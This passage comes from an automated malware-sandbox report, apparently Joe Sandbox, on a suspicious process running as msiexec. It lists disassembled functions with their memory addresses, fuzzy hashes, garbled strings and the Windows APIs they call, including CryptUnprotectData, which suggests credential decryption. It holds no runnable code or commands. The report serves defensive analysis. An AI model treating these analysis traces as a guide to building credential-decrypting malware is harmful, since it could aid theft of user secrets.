Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

LjAp, xrefs: 20F7C92D
0oAp, xrefs: 20F7C7AA
LjAp, xrefs: 20F7C917
PH^q, xrefs: 20F7C98F
PH^q, xrefs: 20F7C9A0

Memory Dump Source

Source File: 00000006.00000002.2957083648.0000000020F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 20F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_20f70000_msiexec.jbxd

Similarity

API ID:
String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
API String ID: 0-1487592376
Opcode ID: a296be7cf4a68291e43086ddef942a53e331dcea9f6424614ab060fc4a1b73e9
Instruction ID: ebb43dc281fa90c977ee86e7a9022e124724792e6d8c058ae4014daaa9dadbe5
Opcode Fuzzy Hash: a296be7cf4a68291e43086ddef942a53e331dcea9f6424614ab060fc4a1b73e9
Instruction Fuzzy Hash: F581D774E40218DFEB04DFA9C994A9DBBF2BF88300F14C06AE918AB365DB749941CF51

Function 20F7CFAB Relevance: 6.4, Strings: 5, Instructions: 182
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

0oAp, xrefs: 20F7D01A
PH^q, xrefs: 20F7D1FF
PH^q, xrefs: 20F7D210
LjAp, xrefs: 20F7D19D
LjAp, xrefs: 20F7D187

Memory Dump Source

Source File: 00000006.00000002.2957083648.0000000020F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 20F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_20f70000_msiexec.jbxd

Similarity

API ID:
String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
API String ID: 0-1487592376
Opcode ID: 463883623349a629eda0a488d42d936d52ec549c27bc7f1b265b260a08e7bf3f
Instruction ID: d16acaf7769bf5ef72443156590834105193c0e06f089d62f14c89694be6ab90
Opcode Fuzzy Hash: 463883623349a629eda0a488d42d936d52ec549c27bc7f1b265b260a08e7bf3f
Instruction Fuzzy Hash: A481C975E40218DFDB08DFA9D984A9DBBF2BF88310F54C06AE408AB365DB745981CF51

Function 20F73E13 Relevance: 2.8, Strings: 2, Instructions: 262
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Xbq, xrefs: 20F73E47
$^q, xrefs: 20F73E2E

Memory Dump Source

Source File: 00000006.00000002.2957083648.0000000020F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 20F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_20f70000_msiexec.jbxd

Similarity

API ID:
String ID: Xbq$$^q
API String ID: 0-1593437937
Opcode ID: fc1e68a91942cf98b09c1162156543441bfcc72373518231594e442cccb65726
Instruction ID: a26afc498809a70130a5e9bb7d6cbea4faa8bce2ed616f15f156057f8c0fdf0b
Opcode Fuzzy Hash: fc1e68a91942cf98b09c1162156543441bfcc72373518231594e442cccb65726
Instruction Fuzzy Hash: 9D819275F04219DBDB18DBB888546AE7BB3BFC8700F14C62ED546E7294CF3898029792

Function 236EB300 Relevance: 1.6, APIs: 1, Instructions: 55encryptionCOMMON

Download Yara Rule

APIs

CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?), ref: 236EBACD

Memory Dump Source

Source File: 00000006.00000002.2963297311.00000000236E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 236E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_236e0000_msiexec.jbxd

Similarity

API ID: CryptDataUnprotect
String ID:
API String ID: 834300711-0
Opcode ID: e1b26ebd0a26c727a86c0447d7f165c308229b38feed16d44f3ba559ef991816
Instruction ID: b4b7a60f0a8d65ba9fb473f43d9955cf57ef3aceed70e6e24481190ae891430e
Opcode Fuzzy Hash: e1b26ebd0a26c727a86c0447d7f165c308229b38feed16d44f3ba559ef991816
Instruction Fuzzy Hash: 421156B28002099FCF11DF99C945BDEBFF4EF48320F14845AEA59A7210C379A994DFA1

Function 236EBA61 Relevance: 1.6, APIs: 1, Instructions: 55encryptionCOMMON

Download Yara Rule

APIs

CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?), ref: 236EBACD

Memory Dump Source

Source File: 00000006.00000002.2963297311.00000000236E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 236E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_236e0000_msiexec.jbxd

Similarity

API ID: CryptDataUnprotect
String ID:
API String ID: 834300711-0
Opcode ID: 186b2c07791908ef34c6ab7984f32d5257aef75edabc5d71af7c97e74b85f80f
Instruction ID: 3e7c7b4149fd2155fc3bb0ac25bcc483f71446c4729127a0f3cac4007e611132
Opcode Fuzzy Hash: 186b2c07791908ef34c6ab7984f32d5257aef75edabc5d71af7c97e74b85f80f
Instruction Fuzzy Hash: 882186B28002499FDF10CF99C840BDEBFF5EF48320F148419E958A3211C339A994DFA1

Function 236EA6E8 Relevance: .3, Instructions: 296COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2963297311.00000000236E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 236E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_236e0000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 84f17c30d1d65fe962c9819b01a6c9ad2251324048a1c6023e33a8eedef85a2d
Instruction ID: f07a5b64cae76fd1360efb6363a8d6d4b473f85db17cb0a0ab56f70664278c8c
Opcode Fuzzy Hash: 84f17c30d1d65fe962c9819b01a6c9ad2251324048a1c6023e33a8eedef85a2d
Instruction Fuzzy Hash: 76E1B274E01218CFEB64CFA5C944B9DBBF2BF49304F2085AAD808A7395DB395A85CF14

Function 236EBB20 Relevance: .3, Instructions: 272COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2963297311.00000000236E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 236E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_236e0000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40c1d285b0f43964a5554b564cb185f5c65f0baea07e8317d2c568630437cec2
Instruction ID: 43502f7903f399f2d402e5f872a61ea53359f56b2d2f73fd4b0fa0b3752e9591
Opcode Fuzzy Hash: 40c1d285b0f43964a5554b564cb185f5c65f0baea07e8317d2c568630437cec2
Instruction Fuzzy Hash: 51D1AD74E013288FDB14CFA5C994B9DBBF2AF89300F1084A9D909AB358DB355E85CF51

Function 236EF9F0 Relevance: .3, Instructions: 272COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2963297311.00000000236E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 236E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_236e0000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1839792f137fb3474373eac01877e2f5e7157200df2dab96aa1e6d3bbaa0b32a
Instruction ID: 38e02b9e7a5c7f8887848ddff5211e2f4a8f010898de6bce0a66aa19dc9898db
Opcode Fuzzy Hash: 1839792f137fb3474373eac01877e2f5e7157200df2dab96aa1e6d3bbaa0b32a
Instruction Fuzzy Hash: F6D19E74E013288FDB24DFA5C990B9DBBF2AF89300F1084A9D908AB359DB355E85CF51

Function 20F7E988 Relevance: .1, Instructions: 147COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2957083648.0000000020F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 20F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_20f70000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9013af27eb30287684b2d19fc12098476eacd55eedea5c80930ba3d608d1eecc
Instruction ID: 835c60757d55957d61fa4f6f4d259f6227a6003c7ad598d7b255e6379304fbb9
Opcode Fuzzy Hash: 9013af27eb30287684b2d19fc12098476eacd55eedea5c80930ba3d608d1eecc
Instruction Fuzzy Hash: 63519674E00218DFDB18DFAAD494A9DBBF2BF88311F20C02AE919AB365DB345941CF55

Function 00ED5BC4 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 97
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 00ED9351

Strings

@/, xrefs: 00ED933C

Memory Dump Source

Source File: 00000006.00000002.2944205314.0000000000ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ED0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_ed0000_msiexec.jbxd

Similarity

API ID: CallProcWindow
String ID: @/
API String ID: 2714655100-313785063
Opcode ID: f323f5396a8a158d256421d4a3be9ac2016a319f66f14451e7828dc975164977
Instruction ID: 68d361bef18c7557daa1016652cbdf149b14d6024bbcb0a1f379f2f4c9844980
Opcode Fuzzy Hash: f323f5396a8a158d256421d4a3be9ac2016a319f66f14451e7828dc975164977
Instruction Fuzzy Hash: 8D4126B4A00305DFCB14DF99C889AAABBF5FF88314F24C85AD519A7361D774A841CBA0

Function 20F75F38 Relevance: 2.8, Strings: 2, Instructions: 265
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Hbq, xrefs: 20F76056
Hbq, xrefs: 20F76023

Memory Dump Source

Source File: 00000006.00000002.2957083648.0000000020F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 20F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_20f70000_msiexec.jbxd

Similarity

API ID:
String ID: Hbq$Hbq
API String ID: 0-4258043069
Opcode ID: 9ee6d1af2c1a760efdc17d043800d39b870b156cca16fd9be73864297d76821e
Instruction ID: e223694c7f36a3a63513378023e87e8ed8de697834b14dc12938c926c6fb90c0
Opcode Fuzzy Hash: 9ee6d1af2c1a760efdc17d043800d39b870b156cca16fd9be73864297d76821e
Instruction Fuzzy Hash: 1791AF343442149FDB059F64C898B6E7BF3AF88710F14846AE9068B3A2CF789D42D792

Function 20F76498 Relevance: 2.7, Strings: 2, Instructions: 232
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

,bq, xrefs: 20F76578
,bq, xrefs: 20F7656E

Memory Dump Source

Source File: 00000006.00000002.2957083648.0000000020F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 20F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_20f70000_msiexec.jbxd

Similarity

API ID:
String ID: ,bq$,bq
API String ID: 0-2699258169
Opcode ID: 097e781701fbd1a29c52d6940ed9fd33879a410143be108dafeea1566068e82f
Instruction ID: f78119eec4a87f8553aede3abefff9bcfe8317cbd4522fb22fb82ccfdfedd722
Opcode Fuzzy Hash: 097e781701fbd1a29c52d6940ed9fd33879a410143be108dafeea1566068e82f
Instruction Fuzzy Hash: E081AC31A805059FCB04CFA9C884A9ABBF3BF89614F64C16AD505DB375DB31EC41CB52

Function 20F70C8F Relevance: 1.8, Strings: 1, Instructions: 543COMMON

Download Yara Rule

Strings

LR^q, xrefs: 20F70F19

Memory Dump Source

Source File: 00000006.00000002.2957083648.0000000020F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 20F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_20f70000_msiexec.jbxd

Similarity

API ID:
String ID: LR^q
API String ID: 0-2625958711
Opcode ID: 573e07b24b36c5e19105f18eff6fb706c296abd0a4b30e8e498d541790d4f940
Instruction ID: f7143172d4df6448557101b4330142ca184a191d0943780674293fa94644cb53
Opcode Fuzzy Hash: 573e07b24b36c5e19105f18eff6fb706c296abd0a4b30e8e498d541790d4f940
Instruction Fuzzy Hash: D952C774E44619CFCB54DF64DD84A9ABBF2FB48301F108995D809AB368DB742E82CF90

Function 20F70CA0 Relevance: 1.8, Strings: 1, Instructions: 539COMMON

Download Yara Rule

Strings

LR^q, xrefs: 20F70F19

Memory Dump Source

Source File: 00000006.00000002.2957083648.0000000020F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 20F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_20f70000_msiexec.jbxd

Similarity

API ID:
String ID: LR^q
API String ID: 0-2625958711
Opcode ID: c7f97a54cf44a63dc673a2c6195461a5010f823d3ddfbecd86677163720e2891
Instruction ID: d34427e618c9b90ad5844211624ea3e3de8a195253047fe1abdcfacef17ee7ea
Opcode Fuzzy Hash: c7f97a54cf44a63dc673a2c6195461a5010f823d3ddfbecd86677163720e2891
Instruction Fuzzy Hash: 7452C674E44619CFCB54DF64DD84A9ABBF2FB48301F108995D809AB368DB746E82CF90

Function 00ED46E8 Relevance: 1.7, APIs: 1, Instructions: 198COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2944205314.0000000000ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ED0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_ed0000_msiexec.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: c120a28e01e6b4476291e32967a2c1230b711002b16876d00130dd17c7aff086
Instruction ID: 01851d21bb66df22811f08a4cd209731dcc862da5bef72ff8f856d5cabf5032c
Opcode Fuzzy Hash: c120a28e01e6b4476291e32967a2c1230b711002b16876d00130dd17c7aff086
Instruction Fuzzy Hash: F28148B0A00B458FD724CF29D44579ABBF1FF98304F00892ED48AA7B90D734E946CB91

Function 00ED6CC4 Relevance: 1.6, APIs: 1, Instructions: 117COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 00ED6DE2

Memory Dump Source

Source File: 00000006.00000002.2944205314.0000000000ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ED0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_ed0000_msiexec.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 2f98e2f252f9228abb669c20835444cd7ecc387a0863077f58a52585f15067fe
Instruction ID: 69594377d1c1f9fa57855d3310069240f348018abea13851132befde6575a04c
Opcode Fuzzy Hash: 2f98e2f252f9228abb669c20835444cd7ecc387a0863077f58a52585f15067fe
Instruction Fuzzy Hash: 1151CFB1D003499FDB15CFA9D884ADEBFB2FF48304F24822AE819AB210D7749945CF91

Function 00ED6CD0 Relevance: 1.6, APIs: 1, Instructions: 113COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 00ED6DE2

Memory Dump Source

Source File: 00000006.00000002.2944205314.0000000000ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ED0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_ed0000_msiexec.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: b702ffe2880fd8a51840350df55020f6a8bfc3d8ae7ff8fe2f37608903d25dc2
Instruction ID: 238ed8c42e7c4fc4943d09ee15475982e7c3e836dd705a5987788f9ae91750f6
Opcode Fuzzy Hash: b702ffe2880fd8a51840350df55020f6a8bfc3d8ae7ff8fe2f37608903d25dc2
Instruction Fuzzy Hash: 4E41C2B1D003499FDB14CF99D984ADEBBB5FF48314F24812AE819AB210D7749945CF91

Function 00ED3638 Relevance: 1.6, APIs: 1, Instructions: 50COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,?,?,?,?,?,00ED4704), ref: 00ED493E

Memory Dump Source

Source File: 00000006.00000002.2944205314.0000000000ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ED0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_ed0000_msiexec.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 49d0d96fd63fbae39dc3066bc2a6e2f5c18e5f33f19a2a309db53b2c678efffc
Instruction ID: a7d35cc26a44c9e54c5f66540245f9aa2a56d138116a3bccdeb47c5980cdb12e
Opcode Fuzzy Hash: 49d0d96fd63fbae39dc3066bc2a6e2f5c18e5f33f19a2a309db53b2c678efffc
Instruction Fuzzy Hash: 791120B58003498FCB10CF9AD444ADEFBF4EB88324F10902AD969B7340C374A945CFA1

Function 00EDB7D0 Relevance: 1.5, APIs: 1, Instructions: 48comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 00EDB82D

Memory Dump Source

Source File: 00000006.00000002.2944205314.0000000000ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ED0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_ed0000_msiexec.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 53053778be324dcd4d3880daf03ac05b4aa0d7de62006e9d434210e83b70bed2
Instruction ID: 57ac43a8cd23432be877f0bfc6c5ed567339e7581a82072aeec190ad4614159d
Opcode Fuzzy Hash: 53053778be324dcd4d3880daf03ac05b4aa0d7de62006e9d434210e83b70bed2
Instruction Fuzzy Hash: D71155B58042488FCB10CFA9D484BDEFFF4EB48320F20856AD559A3710D378AA44CFA1

Function 00EDA980 Relevance: 1.5, APIs: 1, Instructions: 46comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 00EDB82D

Memory Dump Source

Source File: 00000006.00000002.2944205314.0000000000ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ED0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_ed0000_msiexec.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: c65b68755fa61d85c94f7838939bd2f38c24dc7d25080bb8cea2852cb822d466
Instruction ID: fa175ee6e0e114c2c9d2b03db7d637e8edbec85c639d6ab927f7810be5f5b0ad
Opcode Fuzzy Hash: c65b68755fa61d85c94f7838939bd2f38c24dc7d25080bb8cea2852cb822d466
Instruction Fuzzy Hash: 1511F2B5900248CFCB20DF9AD449BDABBF4EB88320F20946AD559A7300D374A944CBA5

Function 20F7AFD7 Relevance: 1.3, Strings: 1, Instructions: 96COMMON

Download Yara Rule

Strings

(o^q, xrefs: 20F7B079

Memory Dump Source

Source File: 00000006.00000002.2957083648.0000000020F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 20F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_20f70000_msiexec.jbxd

Similarity

API ID:
String ID: (o^q
API String ID: 0-74704288
Opcode ID: 1ee2cb3eac8eca86c658539ae1509c698336ecf02316c9e449c619003e73bd9b
Instruction ID: b3a5e30fbd3dc318a4e77aabdefb0b5b327ce711ef057292cfb9472e5acb51fe
Opcode Fuzzy Hash: 1ee2cb3eac8eca86c658539ae1509c698336ecf02316c9e449c619003e73bd9b
Instruction Fuzzy Hash: 2F3138767446548FC7069BB8881466E7FF3AFCA211B1484ABD615C73B2CF389D02C792

Function 20F7E018 Relevance: .6, Instructions: 647COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2957083648.0000000020F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 20F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_20f70000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6057df9fca7b517cc16f15d90972fb676391fae357421e58f5e1cae756e50c58
Instruction ID: b9187ed22c43a10832d8ff2897136302bbfbccc9565a576ffe530ba6a9688e92
Opcode Fuzzy Hash: 6057df9fca7b517cc16f15d90972fb676391fae357421e58f5e1cae756e50c58
Instruction Fuzzy Hash: 1812AA344A9B478FD2506F70EDEC12E7A61FB5F323B06AC15E11FC0079AB791549EA22

Function 20F7D548 Relevance: .1, Instructions: 138COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2957083648.0000000020F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 20F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_20f70000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2ee683d85aef6c389d63fe826c0dc2206ddd97da6070e21d9c5e3a0c51eae06f
Instruction ID: 1c5e4866e2e76b7a738dd3e073a2f8ec1d9ed80bcfdd0c47760ad2ebc3216398
Opcode Fuzzy Hash: 2ee683d85aef6c389d63fe826c0dc2206ddd97da6070e21d9c5e3a0c51eae06f
Instruction Fuzzy Hash: 17517475E01218DFDB44DFA9D9849DDBBF2BF89300F24816AE919AB365DB30A905CF10

Function 20F741A0 Relevance: .1, Instructions: 134COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2957083648.0000000020F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 20F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_20f70000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 25b280b9e267b8588f281f5e1a514717ff108ed49e7b4bfba30a720bb3d2518b
Instruction ID: 0af3796f0568cd5bd64bee1ed34c66a04d777c49376f5605173457a0b8f4a59b
Opcode Fuzzy Hash: 25b280b9e267b8588f281f5e1a514717ff108ed49e7b4bfba30a720bb3d2518b
Instruction Fuzzy Hash: 7051A474E41208CFCB48DFA9D48499DBBF2FF89310F208469E809AB324DB35A942CF51

Function 20F75658 Relevance: .1, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2957083648.0000000020F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 20F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_20f70000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 224d24cd668471ee57fc9948c03374ef5666cca6b69fca74151aae88f5a08340
Instruction ID: 2870bbcb9b2f0e8ef44c1c27f4bf315f76f921dfea96e56a0b4a3a0159333821
Opcode Fuzzy Hash: 224d24cd668471ee57fc9948c03374ef5666cca6b69fca74151aae88f5a08340
Instruction Fuzzy Hash: 70318031284149EFCB059F95C884A6F3BB3EB48750F108425F9198B265CB79DE22DBA1

Function 00A0D006 Relevance: .1, Instructions: 82COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2943471105.0000000000A0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A0D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_a0d000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d8e9d11bc120e1fa984a76ed0399a91509a41d9e6bc108f69a397aa9381c96c6
Instruction ID: df4f26bde25441a28ac07673035124f2f0ccec122a920baeda9662610ec4b6c0
Opcode Fuzzy Hash: d8e9d11bc120e1fa984a76ed0399a91509a41d9e6bc108f69a397aa9381c96c6
Instruction Fuzzy Hash: 50312D7550E3C49FD707CF60D9A4711BF71AB47214F29C5DBD8898F6A3C22A980ACB62

Function 20F762F0 Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2957083648.0000000020F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 20F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_20f70000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bfbb1fed3831f9178e4132bed483ac544d12df7d5fc243d68e1a01ac52c22cc1
Instruction ID: 0158a2acf2c83a2327779db9edafc9520b6aaadb5f2ac366870d066b82f2bfba
Opcode Fuzzy Hash: bfbb1fed3831f9178e4132bed483ac544d12df7d5fc243d68e1a01ac52c22cc1
Instruction Fuzzy Hash: 252107317855119FC7159BA6C89492EB7B3AFC9761B14807AE90ACB3A4CF38CC02C791

Function 20F728F0 Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2957083648.0000000020F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 20F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_20f70000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c8b3676f6b0e0867cba5868001a569ef26f5190090f68005576b05922956c7c6
Instruction ID: 24b4fc7f28c6414c3a4f444ddea01f2d1049abe07910eb4159b54fc3a4bb3148
Opcode Fuzzy Hash: c8b3676f6b0e0867cba5868001a569ef26f5190090f68005576b05922956c7c6
Instruction Fuzzy Hash: 4921AE71A00105AFCB54DF74C4809AE37B6EB9D264F24C41AE94A9B354DA38EE43DBD3

Function 00A0D044 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2943471105.0000000000A0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A0D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_a0d000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cc09a6f9dc3f19e3f0ff80b69c95a7439e7db646585322938c4358055d49527c
Instruction ID: f072569002dca77a2ad8b8965abef93b6d1f674ca20be546c9414af6dd12013a
Opcode Fuzzy Hash: cc09a6f9dc3f19e3f0ff80b69c95a7439e7db646585322938c4358055d49527c
Instruction Fuzzy Hash: ED21D376604208AFCB14CF64E9C4B26BBA5FB84314F24CA6DE84E4B281C736D856CA61

Function 20F75649 Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2957083648.0000000020F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 20F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_20f70000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7f74aa475a8682b6a0c2e177b261bed8d8419aa99fefd930f13cec8a3204a25d
Instruction ID: 365cab818446cca2ec3042950bdc00b70cc436eaefca591529882ae1139a2046
Opcode Fuzzy Hash: 7f74aa475a8682b6a0c2e177b261bed8d8419aa99fefd930f13cec8a3204a25d
Instruction Fuzzy Hash: F2210731689188DFCB019FA5C884A6F3BF2EB45710F10806AF9098F365CB78DE11CBA1

Function 20F729EC Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2957083648.0000000020F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 20F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_20f70000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 17c04885bf50ef1fb6021b4ab7ce77b48a81442832523c19f71aa832e4e96775
Instruction ID: 1599b06776c0c0da6d36d7545c7b3148b061bc187df3bbe9c7d9f1a9d082839a
Opcode Fuzzy Hash: 17c04885bf50ef1fb6021b4ab7ce77b48a81442832523c19f71aa832e4e96775
Instruction Fuzzy Hash: 54212472E0425E8FCB01DBF8DC508EEFBB0FF9A210F248656D525B7150EA346946C7A2

Function 20F76300 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2957083648.0000000020F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 20F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_20f70000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aeb0f90b2a54ca97f1e67c52f62a6bb30081e129e6e2fa4f084e7f592e882747
Instruction ID: 1cf7e406ce45794506f8129ad535cb49804b80ef2029fc1d455cbbcf5f1c1e96
Opcode Fuzzy Hash: aeb0f90b2a54ca97f1e67c52f62a6bb30081e129e6e2fa4f084e7f592e882747
Instruction Fuzzy Hash: 3711E5313459119FC7055B6AC89492E77B7AFC97617148079E90ACB370CF28DC02C791

Function 20F727F0 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2957083648.0000000020F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 20F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_20f70000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 38e123c877ef70e6ce013ba14794ad71d9dabc7dd045eb785acea2a9a151aec6
Instruction ID: d5f1bafe3557583f0d871289c63574c6e9c9a196285bfd6808187e6fc97b7b92
Opcode Fuzzy Hash: 38e123c877ef70e6ce013ba14794ad71d9dabc7dd045eb785acea2a9a151aec6
Instruction Fuzzy Hash: 9E21EF74D086098FCB01EFA8C9855EEBBF1FF09310F10416AD814B2220EB385A95CFA1

Function 20F75E98 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2957083648.0000000020F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 20F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_20f70000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c5d31917784bbd091786a2dffac610cea5ac457f5bae53b88f519cb820391a2b
Instruction ID: d842d6206e14296923d5d2e538030b788b1a62feca37b365064640016b05004c
Opcode Fuzzy Hash: c5d31917784bbd091786a2dffac610cea5ac457f5bae53b88f519cb820391a2b
Instruction Fuzzy Hash: FF01F9326442546FCB068EA58C40BAF3FF7DBC9650F14806BF908CB295DDB98E11D791

Function 20F7AF5B Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2957083648.0000000020F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 20F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_20f70000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
